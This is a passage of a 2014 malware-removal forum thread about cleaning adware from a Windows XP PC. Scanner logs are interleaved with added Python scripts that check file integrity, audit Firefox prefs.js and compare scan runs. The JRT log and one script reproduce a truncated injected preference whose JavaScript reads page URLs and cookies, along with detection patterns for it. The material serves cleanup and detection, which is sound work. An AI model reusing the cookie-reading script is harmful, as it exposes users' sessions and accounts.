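    baseline = {rel_path: sha256_file(root / rel_path) for rel_path in files}
    # Simulate tampering with one file and deletion of another after the fact.
    (root / "system32/winlogon.exe").write_bytes(b"replaced by something else")
    (root / "system32/volsnap.sys").unlink()
    return root, baseline


def run_demo() -> dict[str, str]:
    """Build the staged tree and return the verdict for each baseline entry."""
    root, baseline = build_demo_tree()
    return check_integrity(baseline, root)


if __name__ == "__main__":
    for path, verdict in run_demo().items():
        print(f"{path} => {verdict}")
```

In practice the baseline would come from a trusted source (install media, a vendor catalog, or a hash recorded before the machine was exposed), never from the suspect machine itself; a baseline taken after infection would simply bless the tampered files.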


    #10 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:09 AM

    Hi there bud! Here are the logs that you need.

     

    • ESET Service Scanner log

    Log Opened: 2014-05-30 @ 21:31:26

    21:31:26 - -----------------
    21:31:26 - | Begin Logging |
    21:31:26 - -----------------
    21:31:26 - Fix started on a WIN_XP X86 computer
    21:31:26 - Prep in progress.  Please Wait.
    21:31:30 - Prep complete
    21:31:30 - Repairing Services Now.  Please wait...
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\BITS.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\BITS>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\SharedAccess.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Setup>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters\FirewallPolicy>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess\Epoch>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\SharedAccess>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\wscsvc.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wscsvc>
     
    SetACL finished successfully.
     
    The operation completed successfully
    INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that require the object name may be combined with -restore.
    INFORMATION: Input file for restore operation opened: '.\XP\wuauserv.sddl'
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Enum>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Security>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv\Parameters>
    INFORMATION: Restoring SD of: <machine\System\CurrentControlset\Services\wuauserv>
     
    SetACL finished successfully.
    21:31:32 - Services Repair Complete.
    21:31:34 - Reboot Initiated
     
    • New FSS log

    Farbar Service Scanner Version: 21-05-2014

    Ran by Gery (administrator) on 30-05-2014 at 21:37:12
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Google IP is accessible.
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
    Srservice Service is not running. Checking service configuration:
    The start type of Srservice service is set to Disabled. The default start type is Auto.
    The ImagePath of Srservice service is OK.
    The ServiceDll of Srservice: "C:\WINDOWS\system32\srsvc.dll".
     
    sr Service is not running. Checking service configuration:
    The start type of sr service is set to Disabled. The default start type is Boot.
    The ImagePath of sr: "\SystemRoot\system32\DRIVERS\sr.sys".
     
     
    System Restore Disabled Policy: 
    ========================
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR"=DWORD:1
     
     
    Security Center:
    ============
     
     
    Windows Update:
    ============
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
    Checking Start type of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking ImagePath of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
     
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    • JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Thisisu
    Version: 6.1.4 (04.06.2014:1)
    OS: Microsoft Windows XP x86
    Ran by Gery on 2014-05-30 星期五 at 21:38:47.70
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     
     
    ~~~ Services
     
     
     
    ~~~ Registry Values
     
    Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
    Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL
    Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
    Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL
     
     
     
    ~~~ Registry Keys
     
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
    Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\conduit
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\ilivid
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\softonic
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\startsearch
    Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
    Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\prod.cap
     
     
     
    ~~~ Files
     
     
     
    ~~~ Folders
     
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\babylon"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\softsafe"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\application data\ytd video downloader"
    Successfully deleted: [Folder] "C:\Documents and Settings\Gery\Application Data\tencent"
    Successfully deleted: [Folder] "C:\Program Files\tencent"
    Successfully deleted: [Folder] "C:\Documents and Settings\All Users\start menu\programs\ytd video downloader"
     
     
     
    ~~~ FireFox
     
    Successfully deleted: [File] C:\Documents and Settings\Gery\Application Data\mozilla\firefox\profiles\3s30ge9d.default\user.js
    Successfully deleted the following from C:\Documents and Settings\Gery\Application Data\mozilla\firefox\profiles\3s30ge9d.default\prefs.js
     
    user_pref("extensions.5157d2ca60dc9.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.co
    user_pref("extensions.delta.admin", false);
    user_pref("extensions.delta.aflt", "babsst");
    user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");
    user_pref("extensions.delta.autoRvrt", "false");
    user_pref("extensions.delta.dfltLng", "en");
    user_pref("extensions.delta.excTlbr", false);
    user_pref("extensions.delta.ffxUnstlRst", true);
    user_pref("extensions.delta.id", "c44102c4000000000000001cc09e9dd6");
    user_pref("extensions.delta.instlDay", "15967");
    user_pref("extensions.delta.instlRef", "sst");
    user_pref("extensions.delta.newTab", false);
    user_pref("extensions.delta.prdct", "delta");
    user_pref("extensions.delta.prtnrId", "delta");
    user_pref("extensions.delta.rvrt", "false");
    user_pref("extensions.delta.smplGrp", "none");
    user_pref("extensions.delta.tlbrId", "base");
    user_pref("extensions.delta.tlbrSrchUrl", "");
    user_pref("extensions.delta.vrsn", "1.8.24.6");
    user_pref("extensions.delta.vrsnTs", "1.8.24.619:21:36");
    user_pref("extensions.delta.vrsni", "1.8.24.6");
    user_pref("extensions.delta_i.babExt", "");
    user_pref("extensions.delta_i.babTrack", "affID=124741&tsp=5010");
    user_pref("extensions.delta_i.srcExt", "ss");
     
     
     
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 2014-05-30 星期五 at 21:41:29.15
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     

     
    • Was SFC able to repair any errors?

    Well, basically it is repairing something, but for some of them, maybe almost 70%, a window shows that I need to insert my Windows XP SP3 CD. The fact is my CD is missing somewhere in my house; I tried to find it when I needed to install Japanese and Chinese fonts but never found it. So I keep clicking the "Cancel" choice when it shows up.


    Edited by trussardi15, 30 May 2014 - 10:19 AM.
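The JRT section above removed a `user.js` and a set of `user_pref()` lines from `prefs.js`: one preference whose value is a JavaScript function that reads `location.href` and `document.cookie`, plus a block of `extensions.delta.*` settings. As an added example (not code from the thread, from JRT or from Mozilla), the script below shows how a defender can audit a `prefs.js` for exactly those two shapes: an executable script stored in a preference value, and preferences under an adware namespace or an opaque hex extension id. The sample preferences are constructed to resemble the removed entries; the `extensions.delta` prefix and the "opaque id" heuristic are assumptions about what to treat as unwanted.

```python
"""Audit Firefox prefs.js user_pref() lines for injected script and adware settings.

Added example; not code from the thread, from JRT, or from Mozilla.  The sample
prefs below are constructed to resemble the entries JRT stripped from prefs.js.
"""
import re

# user_pref("name", value);  where value is a JS literal (string, bool or number)
PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.*)\);?\s*$')

# Substrings that mark a preference *value* as executable script rather than a
# plain setting; modelled on the injected "scode" value shown in the JRT log.
SCRIPT_MARKERS = ("(function(", "document.cookie", "location.href", "eval(")

# Preference namespaces JRT removed above.  Assumption: anything under these
# prefixes is unwanted.
ADWARE_PREFIXES = ("extensions.delta.", "extensions.delta_i.")

# Extensions that hide behind an opaque hex id instead of a readable name
# (heuristic; assumption, not a Mozilla rule).
OPAQUE_ID_RE = re.compile(r"extensions\.[0-9a-f]{10,}\.\w+")

# Constructed sample, modelled on the JRT output above.
SAMPLE_PREFS = r"""
# Mozilla User Preferences (constructed sample)
user_pref("browser.startup.homepage", "about:home");
user_pref("extensions.5157d2ca60dc9.scode", "(function(){try{var url=(window.self.location.href + document.cookie);}catch(e){}})();");
user_pref("extensions.delta.admin", false);
user_pref("extensions.delta.aflt", "babsst");
user_pref("extensions.delta_i.babTrack", "affID=124741&tsp=5010");
"""


def parse_pref(line):
    """Return (name, raw_value) for a user_pref line, or None for anything else."""
    m = PREF_RE.match(line)
    return (m.group(1), m.group(2)) if m else None


def classify(name, raw_value):
    """Return the list of reasons a preference looks malicious (empty if clean)."""
    reasons = []
    if name.startswith(ADWARE_PREFIXES):
        reasons.append("adware namespace")
    if OPAQUE_ID_RE.fullmatch(name):
        reasons.append("opaque extension id")
    if any(marker in raw_value for marker in SCRIPT_MARKERS):
        reasons.append("script in value")
    return reasons


def audit(prefs_text):
    """Map each suspicious preference name to the reasons it was flagged."""
    findings = {}
    for line in prefs_text.splitlines():
        parsed = parse_pref(line)
        if parsed is None:
            continue
        name, raw_value = parsed
        reasons = classify(name, raw_value)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_PREFS).items():
        print(f"{name}: {', '.join(reasons)}")
```

Run against a real profile by reading `prefs.js` into `audit()`; the `extensions.<hex>.scode` entry is the one worth treating as a compromise indicator, since a legitimate preference never needs to carry a function body that inspects the page URL and cookies.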


    #11 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 10:37 AM

    Ok, let's keep going.

     

    Can you turn on system restore? Follow the instructions here.

     

    Please download each of the files below to your desktop. Right-click on each one and select "Merge." Answer yes to any prompts.

    PolicyAgent.reg

    RemoteAccess.reg

     

    Please run FSS again after this and post the log for me.

     

    Now,

    We may be able to use SFC without your CD. Do you have a C:\I386 folder on your computer?


    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here.

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #12 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:44 AM

    Okay, I already turned System Restore on.

    Merge also done.

     

    And this is the FSS log:

     

    Farbar Service Scanner Version: 21-05-2014
    Ran by Gery (administrator) on 30-05-2014 at 22:28:59
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Attempt to access Google IP returned error. Google IP is unreachable
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
     
    System Restore Disabled Policy: 
    ========================
     
     
    Security Center:
    ============
     
     
    Windows Update:
    ============
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    Hmmmm, I looked for it, but I think I don't have that kind of folder on my drive C.
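The two FSS logs in this thread are a before/after pair: the first (taken after the services repair) still reported the firewall and System Restore disabled by policy, the Srservice and sr start types changed to Disabled, and the PolicyAgent and RemoteAccess service keys missing; the one above, taken after merging the two .reg files, no longer shows the System Restore or service findings, still shows the firewall policy, and newly reports the Google IP as unreachable. As an added example (not code from the thread or from Farbar's tool), the script below parses the lines FSS prints for these conditions and diffs two runs so the repair can be verified mechanically rather than by eye. `BEFORE_LOG` and `AFTER_LOG` are shortened, constructed versions of the two posted logs; which policy values count as "disabling" is an assumption encoded in `issues()`.

```python
"""Parse Farbar Service Scanner (FSS) logs and diff two runs.

Added example; not code from the thread or from FSS itself.  BEFORE_LOG and
AFTER_LOG are shortened, constructed versions of the two logs posted above.
"""
import re

# FSS prints these lines only when something is off; a clean run prints none.
POLICY_RE = re.compile(r'^"(\w+)"=DWORD:(\d+)$')
MISSING_KEY_RE = re.compile(r"Unable to open (\w+) registry key")
START_TYPE_RE = re.compile(
    r"The start type of (\w+) service is set to (\w+)\. The default start type is (\w+)\.")
MD5_RE = re.compile(r"^(\S+) => MD5 is (.+)$")
UNREACH_RE = re.compile(r"Attempt to access (.+?) returned error")

BEFORE_LOG = r"""
Connection Status:
==============
Google IP is accessible.

Firewall Disabled Policy:
==================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=DWORD:0

System Restore:
============
The start type of Srservice service is set to Disabled. The default start type is Auto.
The start type of sr service is set to Disabled. The default start type is Boot.

System Restore Disabled Policy:
========================
"DisableSR"=DWORD:1

Other Services:
==============
Checking Start type of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.

File Check:
========
C:\WINDOWS\system32\services.exe => MD5 is legit
"""

AFTER_LOG = r"""
Connection Status:
==============
Attempt to access Google IP returned error. Google IP is unreachable

Firewall Disabled Policy:
==================
"EnableFirewall"=DWORD:0

File Check:
========
C:\WINDOWS\system32\services.exe => MD5 is legit
"""


def parse_fss(text):
    """Extract the security-relevant findings from one FSS log."""
    f = {"policies": {}, "missing_keys": set(), "wrong_start_type": {},
         "bad_md5": set(), "unreachable": set()}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := POLICY_RE.match(line)):
            f["policies"][m.group(1)] = int(m.group(2))
        elif (m := MISSING_KEY_RE.search(line)):
            f["missing_keys"].add(m.group(1))
        elif (m := START_TYPE_RE.search(line)) and m.group(2) != m.group(3):
            f["wrong_start_type"][m.group(1)] = (m.group(2), m.group(3))
        elif (m := MD5_RE.match(line)) and m.group(2) != "legit":
            f["bad_md5"].add(m.group(1))
        elif (m := UNREACH_RE.search(line)):
            f["unreachable"].add(m.group(1))
    return f


def issues(f):
    """Flatten findings into stable issue strings so two runs can be compared."""
    out = set()
    for name, val in f["policies"].items():
        # Assumption: EnableFirewall=0 and Disable*=1 are the values that turn a
        # protection off, which is what both posted logs show.
        if (name == "EnableFirewall" and val == 0) or (name.startswith("Disable") and val == 1):
            out.add(f"policy:{name}={val}")
    out.update(f"missing-key:{svc}" for svc in f["missing_keys"])
    out.update(f"start-type:{svc}={actual} (default {default})"
               for svc, (actual, default) in f["wrong_start_type"].items())
    out.update(f"md5:{path}" for path in f["bad_md5"])
    out.update(f"net:{target}" for target in f["unreachable"])
    return out


def diff_runs(before_text, after_text):
    """Report which issues the repair fixed, which remain, and which are new."""
    before, after = issues(parse_fss(before_text)), issues(parse_fss(after_text))
    return {"fixed": sorted(before - after),
            "remaining": sorted(before & after),
            "new": sorted(after - before)}


if __name__ == "__main__":
    for kind, items in diff_runs(BEFORE_LOG, AFTER_LOG).items():
        print(kind, items)
```

On the two constructed logs the diff reports the System Restore policy, both start-type changes and both missing service keys as fixed, the firewall policy as remaining, and the Google IP failure as new; that last item is the kind of regression a reviewer wants surfaced rather than buried in a second wall of log text.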


    #13 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 10:52 AM

    Let's look at the SFC log.

    • Click on the Start button, then Run...
    • In the box that appears, type cmd and press Enter
     
    Next:
    • Copy and paste the following line of text into the black box:
    note: to paste, right-click in the black box and choose Paste
    findstr /c:"[SR]" %windir%\logs\cbs\cbs.log > "%userprofile%\desktop\sfcdetails.txt"
    • Press Enter to run the command; a text file, sfcdetails.txt, will be created on your desktop
    • Please post the contents of this log in your next reply

    Edited by Bud_91, 30 May 2014 - 10:53 AM.



    #14 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • Local time:02:58 PM

    Posted 30 May 2014 - 10:55 AM

    Ummmm, it is empty.


    Edited by trussardi15, 30 May 2014 - 11:02 AM.


    #15 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 11:00 AM

    Yes, CMD is the black box. I originally posted the incorrect instructions, but they are right now.


    Edited by Bud_91, 30 May 2014 - 12:09 PM.
    typo





